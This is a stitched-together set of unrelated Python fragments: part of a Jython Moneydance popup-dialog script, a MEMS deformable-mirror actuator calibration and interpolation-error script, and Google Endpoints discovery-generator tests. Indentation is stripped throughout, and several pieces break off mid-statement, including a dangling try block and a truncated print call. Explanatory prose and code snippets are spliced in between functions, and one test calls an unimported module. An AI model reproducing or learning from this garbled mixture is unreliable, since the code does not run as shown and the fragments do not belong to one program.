_popupPanel.add(_label1)
myScrollPane = JScrollPane(displayJText, JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED,JScrollPane.HORIZONTAL_SCROLLBAR_AS_NEEDED)
if displayJText.getLineCount()>5:
myScrollPane.setWheelScrollingEnabled(True)
_popupPanel.add(myScrollPane)
else:
_popupPanel.add(displayJText)
buttonPanel = JPanel()
if self.callingClass.lModal or self.callingClass.lCancelButton:
buttonPanel.setLayout(FlowLayout(FlowLayout.CENTER))
if self.callingClass.lCancelButton:
cancel_button = JButton("CANCEL")
cancel_button.setPreferredSize(Dimension(100,40))
cancel_button.setBackground(Color.LIGHT_GRAY)
cancel_button.setBorderPainted(False)
cancel_button.setOpaque(True)
cancel_button.addActionListener( self.callingClass.CancelButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult) )
buttonPanel.add(cancel_button)
if self.callingClass.lModal:
ok_button = JButton(self.callingClass.OKButtonText)
if len(self.callingClass.OKButtonText) <= 2:
ok_button.setPreferredSize(Dimension(100,40))
else:
ok_button.setPreferredSize(Dimension(200,40))
ok_button.setBackground(Color.LIGHT_GRAY)
ok_button.setBorderPainted(False)
ok_button.setOpaque(True)
ok_button.addActionListener( self.callingClass.OKButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame, self.callingClass.lResult) )
buttonPanel.add(ok_button)
_popupPanel.add(buttonPanel)
if self.callingClass.lAlertLevel>=2:
# internalScrollPane.setBackground(Color.RED)
# theJText.setBackground(Color.RED)
# theJText.setForeground(Color.BLACK)
displayJText.setBackground(Color.RED)
displayJText.setForeground(Color.BLACK)
_popupPanel.setBackground(Color.RED)
_popupPanel.setForeground(Color.BLACK)
buttonPanel.setBackground(Color.RED)
myScrollPane.setBackground(Color.RED)
elif self.callingClass.lAlertLevel>=1:
# internalScrollPane.setBackground(Color.YELLOW)
# theJText.setBackground(Color.YELLOW)
# theJText.setForeground(Color.BLACK)
displayJText.setBackground(Color.YELLOW)
displayJText.setForeground(Color.BLACK)
_popupPanel.setBackground(Color.YELLOW)
_popupPanel.setForeground(Color.BLACK)
buttonPanel.setBackground(Color.YELLOW)
myScrollPane.setBackground(Color.YELLOW)
self.callingClass._popup_d.add(_popupPanel)
self.callingClass._popup_d.pack()
self.callingClass._popup_d.setLocationRelativeTo(None)
self.callingClass._popup_d.setVisible(True) # Keeping this modal....
if not SwingUtilities.isEventDispatchThread():
myPrint("DB",".. Not running within the EDT so calling via MyPopUpDialogBoxRunnable()...")
SwingUtilities.invokeAndWait(MyPopUpDialogBoxRunnable(self))
else:
myPrint("DB",".. Already within the EDT so calling naked...")
MyPopUpDialogBoxRunnable(self).run()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return self.lResult[0]
def play_the_money_sound():
# Seems to cause a crash on Virtual Machine with no Audio - so just in case....
try:
MD_REF.getUI().getSounds().playSound("cash_register.wav")
except:
pass
return
def get_filename_addition():
cal = Calendar.getInstance()
hhmm = str(10000 + cal.get(Calendar.HOUR_OF_DAY) * 100 + cal.get(Calendar.MINUTE))[1:]
nameAddition = "-" + str(DateUtil.getStrippedDateInt()) + "-"+hhmm
return nameAddition
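get_filename_addition() builds a "-YYYYMMDD-HHMM" suffix via java.util.Calendar arithmetic; a pure-Python equivalent with `datetime.strftime` (assuming DateUtil.getStrippedDateInt() returns the date as YYYYMMDD):

```python
import datetime

def get_filename_addition(now=None):
    # "-YYYYMMDD-HHMM": the str(10000 + h*100 + m)[1:] trick above
    # is just zero-padding, which strftime does directly
    now = now or datetime.datetime.now()
    return now.strftime("-%Y%m%d-%H%M")

print(get_filename_addition(datetime.datetime(2024, 1, 2, 3, 4)))  # -20240102-0304
```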
def check_file_writable(fnm):
myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()" )
myPrint("DB","Checking path: ", fnm)
if os.path.exists(fnm):
myPrint("DB", "path exists..")
# path exists
if os.path.isfile(fnm): # is it a file or a dir?
myPrint("DB","path is a file..")
# also works when file is a link and the target is writable
return os.access(fnm, os.W_OK)
else:
myPrint("DB", "path is not a file..")
return False # path is a dir, so cannot write as a file
# target does not exist, check perms on parent dir
myPrint("DB","path does not exist...")
pdir = os.path.dirname(fnm)
if not pdir: pdir = '.'
# target is creatable if parent dir is writable
return os.access(pdir, os.W_OK)
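check_file_writable() distinguishes three cases: an existing file, an existing directory, and a missing target whose parent directory decides. A compact sketch of the same decision tree:

```python
import os
import tempfile

def is_writable_target(fnm):
    # existing file -> os.access; existing dir -> not a valid file target;
    # missing target -> creatable iff the parent directory is writable
    if os.path.exists(fnm):
        return os.path.isfile(fnm) and os.access(fnm, os.W_OK)
    pdir = os.path.dirname(fnm) or "."
    return os.access(pdir, os.W_OK)

tmp = tempfile.mkdtemp()
print(is_writable_target(os.path.join(tmp, "new.txt")))  # True: parent is writable
print(is_writable_target(tmp))                           # False: a directory
```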
class ExtFilenameFilter(FilenameFilter):
ext = ""
def __init__(self, ext):
self.ext = "." + ext.upper()
def accept(self, thedir, filename): # noqa
if filename is not None and filename.upper().endswith(self.ext):
return True
return False
try:
moneydanceIcon
from tesi_ao import main220316
import matplotlib.pyplot as plt
import numpy as np
from astropy.io import fits
from tesi_ao.mems_command_to_position_linearization_measurer import CommandToPositionLinearizationMeasurer
from tesi_ao.mems_command_to_position_linearization_analyzer import CommandToPositionLinearizationAnalyzer
def _what_I_do_on_terminal(): # don't use!
'''
an example of how I used main220303
'''
iea = InterpolationErrorAnalyzer(ACTUATOR=63, NUM_SCAN_LIST=[
10, 20, 30, 40, 50, 60, 100], test_points=20)
# do and save WF maps for each scan sampling
iea.do_more_scans('_f0')
# load mcl objects into a list
mcls_int = iea.load_mcls('_f0')
# plot all the interpolated functions
iea.plot_all_interpolation_functions(mcls_int)
# plot interpolated function difference wrt the one with the biggest
# samples
iea.plot_interpolation_difference(mcls_int)
# from the 'old' mcls elements, we need the interpolated functions
# to compute p2c and save a 'new' measured mcl object
iea.do_calibrated_measure(mcls_int, '_f0')
# load new mcl
mcls_meas = iea.load_calibrated_measure('_f0')
# Plot the difference between the measured and expected deflection, as a
# function of the expected one
rms_list = iea.plot_Measured_vs_Expected_common(mcls_meas, mcls_int)
iea.fitting_Meas_vs_Exp_common(mcls_meas, rms_list, mcls_int)
class InterpolationErrorAnalyzer(object):
ffmt = '.fits'
def __init__(self, ACTUATOR=63, NUM_SCAN_LIST=[10, 20, 30, 40, 50, 60, 100], test_points=10):
self.ACTUATOR = ACTUATOR
self.NUM_SCAN_LIST = NUM_SCAN_LIST
self.test_points = test_points
self.fpath = 'prova/act%d' % ACTUATOR + '/main220303/cplm'
def _execute_measure(self, fname, Nscan):
'''
Executes WF maps measure, one for each scan, and saves the
related CPLM object into fname.fits.
'''
act_list = [self.ACTUATOR]
wyko, bmc = main220316.create_devices()
cplm = CommandToPositionLinearizationMeasurer(wyko, bmc)
cplm.NUMBER_STEPS_VOLTAGE_SCAN = Nscan
cplm.execute_command_scan(act_list)
cplm.save_results(fname)
def _get_mcl_from_file(self, fname):
'''
From a fits file, loads the CPLA object and evaluates the
interpolation function.
Returns the related MemsCommandLinearization object.
'''
cpla = CommandToPositionLinearizationAnalyzer(fname)
mcl = cpla.compute_linearization()
return mcl
def _plot_interpolation_function(self, mcl):
plt.plot(mcl._cmd_vector[0], mcl._deflection[0], 'o',
label='%d scans' % mcl._cmd_vector.shape[1])
Npt = 1024
f_int = mcl._finter[0]
span = np.linspace(
min(mcl._cmd_vector[0]), max(mcl._cmd_vector[0]), Npt)
plt.plot(span, f_int(span), '-', color=plt.gca().lines[-1].get_color())
def _get_common_cmds_range(self, mcl_list):
'''
Returns the extremes [a, b] of the common cmd domain
shared by all the interpolated functions
Input: list, mcl_list
Returns: a, b
'''
min_container = []
max_container = []
for mcl in mcl_list:
min_container.append(min(mcl._cmd_vector[0]))
max_container.append(max(mcl._cmd_vector[0]))
a = max(min_container)
b = min(max_container)
return a, b
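_get_common_cmds_range() (and _get_common_deflections_range below) compute the intersection of several [min, max] intervals as (max of the minima, min of the maxima); the same logic on plain lists:

```python
def common_range(intervals):
    # intersection of [lo, hi] intervals; a > b means the
    # intervals have no common overlap
    a = max(lo for lo, _ in intervals)
    b = min(hi for _, hi in intervals)
    return a, b

print(common_range([(0, 10), (2, 8), (1, 9)]))  # (2, 8)
```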
def _get_common_deflections_range(self, mcl_list):
min_container = []
max_container = []
for mcl in mcl_list:
min_container.append(min(mcl._calibrated_position[0]))
max_container.append(max(mcl._calibrated_position[0]))
a = max(min_container)
b = min(max_container)
return a, b
def do_more_scans(self, version_file):
'''
For each scan sampling defined in NUM_SCAN_LIST,
executes WF mapping through the class objects CPLM and CPLA defined in sandbox.py,
and saves into file.fits
'''
for scans in self.NUM_SCAN_LIST:
print('\n%d voltage scans:' % scans)
fname = self.fpath + '%d' % scans + version_file + self.ffmt
self._execute_measure(fname, scans)
def load_mcls(self, version_file):
'''
Loads MemsCommandLinearization objects defined in sandbox.py,
computed by do_more_scans
and returns them into a list.
Input: string, 'version_file'
Return: list, mcl_list
len(mcl_list) == number of interpolated functions (one for each scan sampling)
'''
mcl_list = []
for scans in self.NUM_SCAN_LIST:
fname = self.fpath + '%d' % scans + version_file + self.ffmt
mcl_list.append(self._get_mcl_from_file(fname))
return mcl_list
def plot_all_interpolation_functions(self, mcl_list):
'''
Plots all interpolated functions obtained by varying scan sampling,
as a function of actuator's deflections.
'''
plt.figure()
plt.clf()
plt.ion()
plt.title('act#%d: interpolation functions for several scans' %
self.ACTUATOR, size=25)
for mcl in mcl_list:
self._plot_interpolation_function(mcl)
plt.xlabel('Commands [au]', size=25)
plt.ylabel('Deflection [m]', size=25)
plt.grid()
plt.legend(loc='best')
def plot_interpolation_difference(self, mcl_list):
'''
Plots the difference between each interpolated function and
the one computed with the biggest scan sampling, as a function of
the actuator's deflections.
Input: list, mcl_list
'''
Npt = 1024
# looking for the common commands domain for the interpolated
# functions
min_span, max_span = self._get_common_cmds_range(mcl_list)
common_span_cmds = np.linspace(
min_span, max_span, Npt)
# interpolated function with the biggest scans sampling
f_ref = mcl_list[-1]._finter[0]
plt.figure()
plt.clf()
plt.ion()
plt.title('act#%d: ' % self.ACTUATOR +
'cubic interpolation error w.r.t. %d scans' % max(self.NUM_SCAN_LIST), size=25)
for idx, scans in enumerate(self.NUM_SCAN_LIST):
f_i = mcl_list[idx]._finter[0]
plt.plot(common_span_cmds, (f_i(common_span_cmds) -
f_ref(common_span_cmds)) / 1e-9, '.-', label='%d scans' % scans)
print((f_i(common_span_cmds) - f_ref(common_span_cmds)).std())
plt.legend(loc='best')
plt.grid()
plt.ylabel('Deflection Difference [m]', size=25)
plt.xlabel('cmd [au]', size=25)
def do_calibrated_measure(self, mcl_list, version):
'''
Through the interpolated functions contained in the 'old' MCL objects
listed in mcl_list, acquires and saves new WF maps using converted
actuator deflections (calling p2c and the MyCalibrationMeasurer class defined below).
Input:
list, mcl_list
string, 'file version'
'''
Npt = self.test_points
# self.NUM_SCAN_LIST
act_list = [self.ACTUATOR]
wyko, bmc = main220316.create_devices()
min_span, max_span = self._get_common_deflections_range(mcl_list)
# ascending order, matching x_exp in plot_Measured_vs_Expected_common
expected_deflection = np.linspace(min_span, max_span, Npt)
# expected_deflection = np.linspace(-800e-9, 1600e-9, Npt) #@act63
#converted_cmd = np.zeros((len(mcl_list), Npt))
for idx, mcl in enumerate(mcl_list):
mcm = MyCalibrationMeasurer(wyko, bmc, mcl, expected_deflection)
mcm.execute_command_scan(act_list)
fname = self.fpath + '%d' % Npt + 'meas' + version + \
'_cal%d' % self.NUM_SCAN_LIST[idx] + self.ffmt
mcm.save_results(fname)
def load_calibrated_measure(self, version):
'''
Loads the 'new' mcl objects from file created by do_calibrated_measure,
and returns them into a list.
Input: string, 'file_version'
Return: list, mcl_list
'''
mcl_list = []
Npt = self.test_points
for scans in self.NUM_SCAN_LIST:
fname = self.fpath + '%d' % Npt + 'meas' + version + \
'_cal%d' % scans + self.ffmt
mcl_list.append(self._get_mcl_from_file(fname))
return mcl_list
def plot_Measured_vs_Expected_common(self, mcl_meas, mcl_int):
'''
Plots the difference between the measured and expected deflection,
as a function of the expected one.
mcl_meas[i]== element of the list loaded from load_calibrated_measure
Input: list, mcls_meas
list, mcl_int (used for common deflection domain evaluation)
'''
Npt = self.test_points
plt.figure()
plt.clf()
min_span, max_span = self._get_common_deflections_range(mcl_int)
#min_span = -800e-9
#max_span = 1600e-9
x_exp = np.linspace(min_span, max_span, Npt) # expected deflections
rms_list = []
for idx in np.arange(len(mcl_meas)):
x_obs = mcl_meas[idx]._deflection[0]
y = x_obs - x_exp
rms = y.std()
rms = rms / 1.e-9
rms_list.append(y.std())
plt.plot(x_exp / 1.e-9, y / 1.e-9, 'o-', label='%d scans' %
self.NUM_SCAN_LIST[idx])
print('rms = %g' % rms + ' nm\t' +
'(Sampling: %d scans)' % self.NUM_SCAN_LIST[idx])
plt.legend(loc='best')
plt.grid()
plt.xlabel('$x_{exp} [nm]$', size=25)
plt.ylabel('$x_{obs} - x_{exp} [nm]$', size=25)
plt.title('act#%d:' % self.ACTUATOR +
' Error in deflection cmds for each interpolation function (common span)', size=25)
return rms_list
# something wrong
def fitting_Meas_vs_Exp_common(self, mcl_meas, rms_list, mcl_int):
'''
Plots the best fits for measured vs expected deflection, for each scan sampling.
'''
Npt = self.test_points
plt.figure()
plt.clf()
min_span, max_span = self._get_common_deflections_range(mcl_int)
#min_span = -800e-9
#max_span = 1600e-9
x_exp = np.linspace(min_span, max_span, Npt)
ones = np.ones(Npt)
xx = np.linspace(min_span, max_span, 1024)
for idx in np.arange(len(mcl_meas)):
x_obs = mcl_meas[idx]._deflection[0]
plt.plot(x_exp, x_obs, 'o', label='%d scans' %
self.NUM_SCAN_LIST[idx])
sigma = ones * rms_list[idx]
# np.polyfit expects weights w = 1/sigma for gaussian uncertainties
coeff, coeff_cov = np.polyfit(
x_exp, x_obs, 1, w=1 / sigma, cov=True, full=False)
err_coeff = np.sqrt(np.diag(coeff_cov))
print('\nFit relative to Sampling: %d scans' %
self.NUM_SCAN_LIST[idx])
print('A = %g' % coeff[0] + '\t+/- %g ' % err_coeff[0])
print('offset = %g' % coeff[1] + '\t+/- %g' % err_coeff[1])
print('Cov Matrix:')
print(coeff_cov)
fit_func = np.poly1d(coeff)
residuals = x_obs - fit_func(x_exp)
chi_2 = np.sum((residuals / sigma)**2)
print('Chi2 = %g' % chi_2)
dof = len(x_obs) - len(coeff)
chi2red = chi_2 / float(dof)
print('RedChi2 = %g' % chi2red)
plt.plot(xx, fit_func(xx), '-', label='relative fit',
color=plt.gca().lines[-1].get_color())
# plt.errorbar(x_exp, x_obs, sigma,
# color=plt.gca().lines[-1].get_color())
plt.legend(loc='best')
plt.grid()
plt.xlabel('$x_{exp} [m]$', size=25)
plt.ylabel('$x_{obs} [m]$', size=25)
plt.title('act#%d:' % self.ACTUATOR +
' Common deflection span', size=25)
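The straight-line fit above can be checked on synthetic data; note that, per the NumPy documentation, np.polyfit expects w = 1/sigma (not sigma) for gaussian uncertainties. A minimal sketch:

```python
import numpy as np

x = np.linspace(0.0, 1.0, 20)
y = 2.0 * x + 1.0                          # exact line: slope 2, offset 1
sigma = np.full_like(x, 0.05)
coeff, cov = np.polyfit(x, y, 1, w=1 / sigma, cov=True)
fit = np.poly1d(coeff)
residuals = y - fit(x)                     # evaluate the model at x, not at y
print(coeff)                               # ~ [2., 1.]
print(residuals.std())
```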
# similar to CommandtoPositionLinearizationMeasurer
class MyCalibrationMeasurer(object): # changes when bmc set shape
'''
Like CommandToPositionLinearizationMeasurer defined in sandbox.py,
acquires WF maps, one for each expected deflection command.
The deflections are converted into voltage commands through the
p2c function stored in the MCL object.
'''
NUMBER_WAVEFRONTS_TO_AVERAGE = 1
#NUMBER_STEPS_VOLTAGE_SCAN = 10
def __init__(self, interferometer, mems_deformable_mirror, mlc, expected_deflections):
self._interf = interferometer
self._bmc = mems_deformable_mirror
self._n_acts = self._bmc.get_number_of_actuators()
self._mlc = mlc
self._exp_deflections = expected_deflections
self.NUMBER_STEPS_VOLTAGE_SCAN = len(expected_deflections)
self._wfflat = None
def _get_zero_command_wavefront(self):
if self._wfflat is None:
cmd = np.zeros(self._n_acts)
self._bmc.set_shape(cmd)
self._wfflat = self._interf.wavefront(
self.NUMBER_WAVEFRONTS_TO_AVERAGE)
return self._wfflat
def execute_command_scan(self, act_list=None):
if act_list is None:
act_list = np.arange(self._n_acts)
self._actuators_list = np.array(act_list)
n_acts_to_meas = len(self._actuators_list)
wfflat = self._get_zero_command_wavefront()
self._reference_cmds = self._bmc.get_reference_shape()
self._reference_tag = self._bmc.get_reference_shape_tag()
self._cmd_vector = np.zeros((n_acts_to_meas,
self.NUMBER_STEPS_VOLTAGE_SCAN))
self._wfs = np.ma.zeros(
(n_acts_to_meas, self.NUMBER_STEPS_VOLTAGE_SCAN,
wfflat.shape[0], wfflat.shape[1]))
N_pixels = self._wfs.shape[2] * self._wfs.shape[3]
for act_idx, act in enumerate(self._actuators_list):
self._cmd_vector[act_idx] = self._mlc.linear_p2c(
act, self._exp_deflections)
for cmd_idx in range(len(self._cmd_vector[act_idx])):
print("Act:%d - command" % (act))
cmd = np.zeros(self._n_acts)
cmd[act] = self._mlc.linear_p2c(
act, self._exp_deflections[cmd_idx])
self._bmc.set_shape(cmd)
self._wfs[act_idx, cmd_idx, :,
:] = self._get_wavefront_flat_subtracted()
masked_pixels = self._wfs[act_idx, cmd_idx].mask.sum()
masked_ratio = masked_pixels / N_pixels
if masked_ratio > 0.8227:
print('Warning: Bad measure acquired for: act%d' %
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for endpoints.discovery_generator."""
import json
import os
import unittest
import test_util
from endpoints import api_config
from endpoints import api_exceptions
from endpoints import discovery_generator
from endpoints import message_types
from endpoints import messages
from endpoints import remote
from endpoints import resource_container
from endpoints import types as endpoints_types
from endpoints import users_id_token
package = 'DiscoveryGeneratorTest'
class Nested(messages.Message):
"""Message class to be used in a message field."""
int_value = messages.IntegerField(1)
string_value = messages.StringField(2)
class SimpleEnum(messages.Enum):
"""Simple enumeration type."""
VAL1 = 1
VAL2 = 2
class IdField(messages.Message):
"""Just contains an integer field."""
id_value = messages.IntegerField(1, variant=messages.Variant.INT32)
class AllFields(messages.Message):
"""Contains all field types."""
bool_value = messages.BooleanField(1, variant=messages.Variant.BOOL)
bytes_value = messages.BytesField(2, variant=messages.Variant.BYTES)
double_value = messages.FloatField(3, variant=messages.Variant.DOUBLE)
enum_value = messages.EnumField(SimpleEnum, 4)
float_value = messages.FloatField(5, variant=messages.Variant.FLOAT)
int32_value = messages.IntegerField(6, variant=messages.Variant.INT32)
int64_value = messages.IntegerField(7, variant=messages.Variant.INT64)
string_value = messages.StringField(8, variant=messages.Variant.STRING)
uint32_value = messages.IntegerField(9, variant=messages.Variant.UINT32)
uint64_value = messages.IntegerField(10, variant=messages.Variant.UINT64)
sint32_value = messages.IntegerField(11, variant=messages.Variant.SINT32)
sint64_value = messages.IntegerField(12, variant=messages.Variant.SINT64)
message_field_value = messages.MessageField(Nested, 13)
datetime_value = message_types.DateTimeField(14)
# This is used to test "all fields" as query parameters instead of the body
# in a request.
ALL_FIELDS_AS_PARAMETERS = resource_container.ResourceContainer(
**{field.name: field for field in AllFields.all_fields()})
class BaseDiscoveryGeneratorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
def setUp(self):
self.generator = discovery_generator.DiscoveryGenerator()
def _def_path(self, path):
return '#/definitions/' + path
class DiscoveryGeneratorTest(BaseDiscoveryGeneratorTest):
def testAllFieldTypes(self):
class PutRequest(messages.Message):
"""Message with just a body field."""
body = messages.MessageField(AllFields, 1)
# pylint: disable=invalid-name
class ItemsPutRequest(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
entryId = messages.StringField(2, required=True)
class ItemsPutRequestForContainer(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
items_put_request_container = resource_container.ResourceContainer(
ItemsPutRequestForContainer,
entryId=messages.StringField(2, required=True))
# pylint: disable=invalid-name
class EntryPublishRequest(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entryId = messages.StringField(2, required=True)
class EntryPublishRequestForContainer(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entry_publish_request_container = resource_container.ResourceContainer(
EntryPublishRequestForContainer,
entryId=messages.StringField(2, required=True))
class BooleanMessageResponse(messages.Message):
result = messages.BooleanField(1, required=True)
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, BooleanMessageResponse,
path='toplevel:withcolon', http_method='GET',
name='toplevelwithcolon')
def toplevel(self, unused_request):
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='entries',
http_method='GET', name='entries.get')
def entries_get(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(ALL_FIELDS_AS_PARAMETERS, message_types.VoidMessage,
path='entries/container', http_method='GET',
name='entries.getContainer')
def entries_get_container(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(PutRequest, BooleanMessageResponse, path='entries',
name='entries.put')
def entries_put(self, unused_request):
"""Request body is in the body field."""
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='process',
name='entries.process')
def entries_process(self, unused_request):
"""Message is the request body."""
return message_types.VoidMessage()
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
name='entries.nested.collection.action',
path='nested')
def entries_nested_collection_action(self, unused_request):
"""A VoidMessage for a request body."""
return message_types.VoidMessage()
@api_config.method(AllFields, AllFields, name='entries.roundtrip',
path='roundtrip')
def entries_roundtrip(self, unused_request):
"""All field types in the request and response."""
pass
# Test a method with a required parameter in the request body.
@api_config.method(EntryPublishRequest, message_types.VoidMessage,
path='entries/{entryId}/publish',
name='entries.publish')
def entries_publish(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
@api_config.method(entry_publish_request_container,
message_types.VoidMessage,
path='entries/container/{entryId}/publish',
name='entries.publishContainer')
def entries_publish_container(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
# Test a method with a parameter in the path and a request body.
@api_config.method(ItemsPutRequest, message_types.VoidMessage,
path='entries/{entryId}/items',
name='entries.items.put')
def items_put(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
@api_config.method(items_put_request_container, message_types.VoidMessage,
path='entries/container/{entryId}/items',
name='entries.items.putContainer')
def items_put_container(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'allfields.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print('Could not find expected output file ' + test_file)
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespace(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
namespace=api_config.Namespace('domain', 'name', 'path'))
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print('Could not find expected output file ' + test_file)
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespaceDefaultPath(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
namespace=api_config.Namespace('domain', 'name', None))
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print('Could not find expected output file ' + test_file)
raise e
# Clear the value of the packagePath parameter in the expected results
expected_discovery['packagePath'] = ''
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespaceWithoutNamespace(self):
"""
The owner_domain, owner_name, and package_path can all
be specified directly on the api.
"""
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
owner_domain='domain', owner_name='name', package_path='path')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print('Could not find expected output file ' + test_file)
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
class DiscoveryMultiClassGeneratorTest(BaseDiscoveryGeneratorTest):
def testMultipleClassService(self):
'''If multiple classes of a single service are passed to the
generator, the document should show all methods from all
classes.'''
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1, required=True)
)
class AirportList(messages.Message):
airports = messages.MessageField(Airport, 1, repeated=True)
@api_config.api(name='iata', version='v1')
class ServicePart1(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
@api_config.api(name='iata', version='v1')
class ServicePart2(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
airports = {
'DEN': 'Denver International Airport'
}
if request.iata not in airports:
raise endpoints.NotFoundException()
return Airport(iata=request.iata, name=airports[request.iata])
doc = self.generator.get_discovery_doc([ServicePart1, ServicePart2])
self.assertItemsEqual(doc['methods'].keys(), [u'get_airport', u'list_airports'])
def testMethodCollisionDetection(self):
'''While multiple classes can be passed to the generator at once,
they should all belong to the same api and version.'''
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
class AirportList(messages.Message):
airports = messages.MessageField(Airport, 1, repeated=True)
@api_config.api(name='iata', version='v1')
class V1Service(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
@api_config.api(name='iata', version='v2')
class V2Service(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'JFK', name=u'<NAME> International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
error = "Multiple apis/versions found: [('iata', 'v1'), ('iata', 'v2')]"
with self.assertRaises(api_exceptions.ApiConfigurationError) as catcher:
self.generator.get_discovery_doc([V1Service, V2Service])
self.assertEqual(catcher.exception.message, error)
@api_config.api(name='iata', version='v1')
class V1ServiceCont(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'JFK', name=u'<NAME> International Airport'),
])
error = "Method iata.list_airports used multiple times"
with self.assertRaises(api_exceptions.ApiConfigurationError) as catcher:
self.generator.get_discovery_doc([V1Service, V1ServiceCont])
self.assertEqual(catcher.exception.message[:len(error)], error)
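The version-collision check exercised by the test above can be sketched generically (an illustration of the idea, not the generator's actual implementation; the function name and input shape are assumptions):

```python
def check_single_api(services):
    """Raise if the services span more than one (name, version) pair."""
    # Collect the distinct (name, version) pairs across all service parts.
    pairs = sorted({(s['name'], s['version']) for s in services})
    if len(pairs) > 1:
        raise ValueError('Multiple apis/versions found: %r' % (pairs,))

# Two parts of the same api/version pass the check.
check_single_api([{'name': 'iata', 'version': 'v1'},
                  {'name': 'iata', 'version': 'v1'}])
```

Mixing versions (for example `v1` and `v2` of `iata`) would raise, mirroring the `ApiConfigurationError` asserted in the test.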
class DiscoveryScopeGeneratorTest(BaseDiscoveryGeneratorTest):
def testDefaultScope(self):
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1)
)
class IataParam(messages.Message):
iata = messages.StringField(1)
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
@api_config.api(
name='iata', version='v1',
